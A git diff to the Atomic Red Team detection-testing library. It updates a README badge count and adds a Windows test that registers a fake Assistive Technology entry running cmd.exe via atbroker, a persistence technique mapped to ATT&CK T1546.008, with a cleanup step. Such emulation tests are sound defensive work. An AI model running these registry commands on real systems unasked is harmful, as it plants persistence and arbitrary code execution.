diff --git a/README.md b/README.md
index 478571c3bf..bfd8a2810f 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1500-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1504-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index 29c314dcb3..c8da24142c 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -87,3 +87,18 @@ atomic_tests:
       icacls %windir%\system32\osk.exe /grant:r Administrators:RX
     name: command_prompt
     elevation_required: true
+- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
+  auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
+  description: |
+    Executes code specified in the registry for a new AT (Assistive Technologies).
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+       reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
+       reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
+       atbroker /start malware_test
+    cleanup_command: |
+       reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
+    name: command_prompt